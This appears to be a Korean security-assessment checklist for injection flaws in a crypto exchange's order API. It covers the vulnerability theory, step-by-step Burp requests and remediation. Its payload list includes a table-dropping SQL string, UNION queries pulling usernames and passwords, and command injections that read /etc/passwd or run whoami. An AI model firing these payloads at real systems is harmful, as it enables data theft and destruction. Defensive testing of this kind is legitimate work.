================================================================================
[VCE-EX-02] 삽입(Injection) 공격 가능성
도메인: exchange
================================================================================

1. 진단 항목 개요
   - 항목명   : 삽입(Injection) 공격 가능성
   - 번호     : VCE-EX-02
   - 위험도   : High
   - 설명     : 주문 생성 API의 assetType 파라미터에 SQL/JPQL 인젝션, NoSQL 인젝션,
                Command Injection 페이로드를 삽입하여 서버 측 쿼리 조작, 데이터 무단 조회
                또는 시스템 명령 실행 가능성을 검증한다. CommunityService.java에서 JPQL
                문자열 연결 취약점이 이미 확인된 바, 동일 패턴이 Exchange 도메인의
                OrderService 또는 관련 서비스에도 존재할 가능성이 높다.

--------------------------------------------------------------------------------

2. 대상 기능 & 엔드포인트
   - 기능 설명  : 암호화폐 주문 생성 및 조회 기능. assetType 파라미터가 백엔드에서
                  쿼리 조건으로 사용될 경우 Injection 취약점이 발생할 수 있다.

   [주문 생성]
   - 로컬  : http://localhost:8080/api/orders
   - 운영  : https://vceapp.com/api/orders
   - 메서드: POST
   - 인증  : JWT Bearer Token 필요

   [주문 조회 / 검색]
   - 로컬  : http://localhost:8080/api/orders?assetType=BTC
   - 운영  : https://vceapp.com/api/orders?assetType=BTC
   - 메서드: GET
   - 인증  : JWT Bearer Token 필요

   [마켓 데이터 조회]
   - 로컬  : http://localhost:8080/api/orders/market?symbol=BTC
   - 운영  : https://vceapp.com/api/orders/market?symbol=BTC
   - 메서드: GET
   - 인증  : 불명 (공개 여부 확인 필요)

--------------------------------------------------------------------------------

3. 취약점 원리 (Why this works)

   [JPQL/SQL 인젝션 원리]
   JPA/Hibernate를 사용하는 Spring Boot 애플리케이션에서 JPQL(Java Persistence Query Language)
   쿼리를 문자열 연결(concatenation)로 동적으로 생성할 경우, 사용자 입력이 쿼리의 일부가 되어
   쿼리 로직을 조작할 수 있다. CommunityService.java:57-64에서 이미 이 패턴이 확인되었으며,
   "SELECT c FROM Community c WHERE c.assetType = '" + assetType + "'" 형태의 코드가
   Exchange 서비스에도 존재할 가능성이 높다.

   [JPQL 인젝션 vs SQL 인젝션의 차이]
   JPQL은 테이블명 대신 Entity 클래스명을 사용하므로 페이로드가 약간 다르다. JPQL에서는
   ' OR '1'='1 페이로드가 동작하며, UNION 구문 대신 서브쿼리 또는 다른 Entity 조회 방식을
   사용한다. 그러나 Hibernate가 최종적으로 SQL을 생성하므로 데이터베이스 종속적인
   SQL 인젝션으로 이어질 수 있다.

   [normalize() 우회 가능성]
   서버에서 입력값에 normalize() 메서드만 적용하는 경우, 유니코드 정규화만 수행할 뿐
   SQL/HTML 특수문자를 차단하지 않는다. Java의 String.normalize()는 유니코드 표준화
   (NFC/NFD)를 수행하는 것으로, 보안 목적의 입력값 검증과는 무관하다. 따라서
   normalize() 적용 후에도 ', ", --, ;, OR, UNION 등의 SQL 특수문자는 그대로 전달된다.

   [NoSQL 인젝션]
   MongoDB 등 NoSQL DB를 함께 사용하는 경우, JSON 파라미터에 연산자($where, $ne, $gt)를
   삽입하여 쿼리 조건을 우회할 수 있다. Spring Data MongoDB 사용 시 파라미터에
   {"$ne": null} 형태를 삽입하면 모든 문서를 반환하는 조건이 될 수 있다.

   [공격 성립 조건]
   - 백엔드에서 assetType 값을 Parameterized Query(PreparedStatement) 없이 문자열로 연결
   - normalize() 또는 단순 trim()만으로 입력값 검증을 대체
   - 오류 메시지가 클라이언트에 노출되어 DB 구조 파악 가능
   - 쿼리 결과가 API 응답에 포함되어 데이터 추출 가능

--------------------------------------------------------------------------------

4. 테스트 절차 (Step-by-step)

   [사전 준비]
   - Burp Suite 실행 및 프록시 설정
   - test@vce.com / test1234로 로그인하여 JWT 토큰 획득
   - Burp Suite Repeater 탭 활용
   - 정상 요청으로 기준선(baseline) 응답 확인 후 비교 분석

   ---[ STEP 1: 기본 에러 기반 SQL 인젝션 탐지 ]---
   단일 따옴표(')를 삽입하여 쿼리 문법 오류 유발:

   --- HTTP 요청 예시 ---
   POST /api/orders HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

   {
     "assetType": "'",
     "orderType": "BUY",
     "price": 1,
     "amount": 0.001
   }
   ---
   판단: 500 Internal Server Error + SQL/JPQL 오류 메시지 노출 시 취약

   ---[ STEP 2: Boolean 기반 블라인드 인젝션 ]---
   조건절 조작으로 응답 차이를 확인한다:

   --- HTTP 요청 예시 (True 조건) ---
   POST /api/orders HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

   {
     "assetType": "BTC' OR '1'='1",
     "orderType": "BUY",
     "price": 1,
     "amount": 0.001
   }
   ---

   --- HTTP 요청 예시 (False 조건) ---
   POST /api/orders HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

   {
     "assetType": "BTC' OR '1'='2",
     "orderType": "BUY",
     "price": 1,
     "amount": 0.001
   }
   ---
   판단: True/False 응답 결과가 다를 경우 Blind SQLi 취약

   ---[ STEP 3: JPQL 인젝션 테스트 ]---
   JPQL 특화 페이로드로 Entity 데이터 조작 시도:

   --- HTTP 요청 예시 ---
   POST /api/orders HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

   {
     "assetType": "BTC' AND 1=1 --",
     "orderType": "BUY",
     "price": 1,
     "amount": 0.001
   }
   ---

   JPQL 서브쿼리 인젝션 시도:
   --- HTTP 요청 예시 ---
   {
     "assetType": "BTC') OR EXISTS(SELECT u FROM User u WHERE u.email='admin@vce.com' --",
     "orderType": "BUY",
     "price": 1,
     "amount": 0.001
   }
   ---

   ---[ STEP 4: GET 파라미터 인젝션 테스트 ]---
   쿼리 파라미터로도 assetType을 받는 경우 URL에서 테스트:

   --- HTTP 요청 예시 ---
   GET /api/orders?assetType=BTC'%20OR%20'1'='1 HTTP/1.1
   Host: localhost:8080
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
   ---

   --- HTTP 요청 예시 (UNION 시도) ---
   GET /api/orders?assetType=BTC'%20UNION%20SELECT%20username,password,3,4%20FROM%20users%20-- HTTP/1.1
   Host: localhost:8080
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
   ---

   ---[ STEP 5: NoSQL 인젝션 테스트 ]---
   MongoDB 연산자를 JSON 파라미터에 삽입:

   --- HTTP 요청 예시 ---
   POST /api/orders HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

   {
     "assetType": {"$ne": null},
     "orderType": "BUY",
     "price": 1,
     "amount": 0.001
   }
   ---

   --- HTTP 요청 예시 (where 연산자) ---
   {
     "assetType": {"$where": "sleep(5000)"},
     "orderType": "BUY",
     "price": 1,
     "amount": 0.001
   }
   ---
   판단: 5초 이상 응답 지연 시 Time-based NoSQLi 취약

   ---[ STEP 6: Command Injection 테스트 ]---
   운영체제 명령어 삽입 시도 (파일명, 경로 파라미터 등):

   --- HTTP 요청 예시 ---
   POST /api/orders HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

   {
     "assetType": "BTC; ls -la",
     "orderType": "BUY",
     "price": 1,
     "amount": 0.001
   }
   ---

   --- HTTP 요청 예시 (백틱/파이프 사용) ---
   {
     "assetType": "BTC`id`",
     "orderType": "BUY",
     "price": 1,
     "amount": 0.001
   }
   ---

   ---[ STEP 7: Time-based Blind SQL 인젝션 ]---
   에러나 응답 차이가 없을 때 응답 지연으로 취약점 판단:

   --- HTTP 요청 예시 (MySQL) ---
   POST /api/orders HTTP/1.1
   Host: localhost:8080
   Content-Type: application/json
   Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

   {
     "assetType": "BTC' AND SLEEP(5)--",
     "orderType": "BUY",
     "price": 1,
     "amount": 0.001
   }
   ---

   --- HTTP 요청 예시 (H2/HSQLDB - 개발 환경) ---
   {
     "assetType": "BTC' AND 1=(SELECT 1 FROM (SELECT SLEEP(5)) t)--",
     "orderType": "BUY",
     "price": 1,
     "amount": 0.001
   }
   ---

   공격 페이로드 목록:
   [SQL/JPQL 기본]
   1. '
   2. ''
   3. ' OR '1'='1
   4. ' OR 1=1--
   5. ' OR 1=1#
   6. '; DROP TABLE orders;--
   7. ' UNION SELECT null,null,null--
   8. ' AND 1=2 UNION SELECT table_name,null FROM information_schema.tables--

   [JPQL 특화]
   9.  ' OR EXISTS(SELECT u FROM User u)--
   10. ') OR ('1'='1
   11. %27 OR %271%27=%271

   [Time-based]
   12. ' AND SLEEP(5)--
   13. '; WAITFOR DELAY '0:0:5'--
   14. ' OR 1=1 AND SLEEP(5)--

   [NoSQL]
   15. {"$gt": ""}
   16. {"$ne": null}
   17. {"$regex": ".*"}

   [Command Injection]
   18. ; ls
   19. | whoami
   20. `id`
   21. $(cat /etc/passwd)
   22. BTC & net user

--------------------------------------------------------------------------------

5. 취약 여부 판단 기준

   ✅ 취약 (Vulnerable):
      - 단일 따옴표(') 삽입 시 500 에러와 함께 SQL/JPQL 오류 메시지 노출
        (예: "could not extract ResultSet", "unexpected token", "ORA-00907")
      - OR 1=1 페이로드 삽입 후 모든 주문 데이터가 반환됨
      - Boolean 조건(True/False)에 따라 응답 크기 또는 내용이 달라짐
      - SLEEP(5) 또는 WAITFOR DELAY 후 실제 5초 이상의 응답 지연 발생
      - NoSQL 연산자($ne, $gt) 삽입 시 모든 문서가 반환됨
      - 명령어 실행 결과가 응답에 포함됨

   ✗ 안전 (Not Vulnerable):
      - 모든 특수문자가 포함된 입력에 400 Bad Request 반환
      - Parameterized Query 사용으로 입력값이 데이터로만 처리됨
      - assetType 허용값 allowlist 검증으로 알 수 없는 값 즉시 거부
      - 오류 발생 시에도 generic 오류 메시지만 반환 (DB 구조 미노출)

--------------------------------------------------------------------------------

6. 예상 취약 포인트 (코드 위치)

   - CommunityService.java:57-64 - JPQL 문자열 연결 취약점 (이미 확인됨)
     -> Exchange 도메인의 OrderService.java 또는 OrderRepository.java에 동일 패턴 존재 가능성
     -> "SELECT o FROM Order o WHERE o.assetType = '" + assetType + "'" 형태의 코드 탐색

   - OrderRepository.java (@Query 애노테이션) - nativeQuery=true 사용 시 더욱 위험
     -> @Query(value = "SELECT * FROM orders WHERE asset_type = '" + assetType + "'", nativeQuery = true)

   - OrderController.java - @RequestParam String assetType 파라미터가 직접 서비스로 전달
     -> @Valid, @Pattern 등의 검증 애노테이션 미적용 여부 확인

   - AssetService.java - 자산 조회 쿼리에서도 동일 패턴 가능성

--------------------------------------------------------------------------------

7. 권고 조치

   - [Parameterized Query 필수 적용] 모든 JPQL/HQL 쿼리에서 문자열 연결 대신
     Named Parameter 또는 Positional Parameter를 사용한다.
     올바른 예: "SELECT o FROM Order o WHERE o.assetType = :assetType"
     와 함께 .setParameter("assetType", assetType) 사용.
     Spring Data JPA의 @Query 애노테이션에서도 :assetType 형태로 바인딩한다.

   - [입력값 allowlist 검증] assetType은 서버 측에서 허용된 코인 심볼 목록과 대조하여
     검증한다. @Pattern(regexp = "^[A-Z]{2,10}$") 또는 Enum 타입으로 변환하여
     유효하지 않은 값은 즉시 400 Bad Request로 거부한다.

   - [오류 메시지 통제] 운영 환경에서 DB 오류, Stack Trace가 클라이언트에 노출되지 않도록
     GlobalExceptionHandler에서 generic 메시지만 반환한다.
     server.error.include-stacktrace=never 설정을 application.properties에 적용한다.

   - [WAF 및 입력값 필터링] OWASP AntiSamy 또는 Spring Security의 입력 필터링을 적용하고,
     SQL 메타문자(', ", --, ;, /*, */)를 포함하는 요청을 사전에 차단한다.
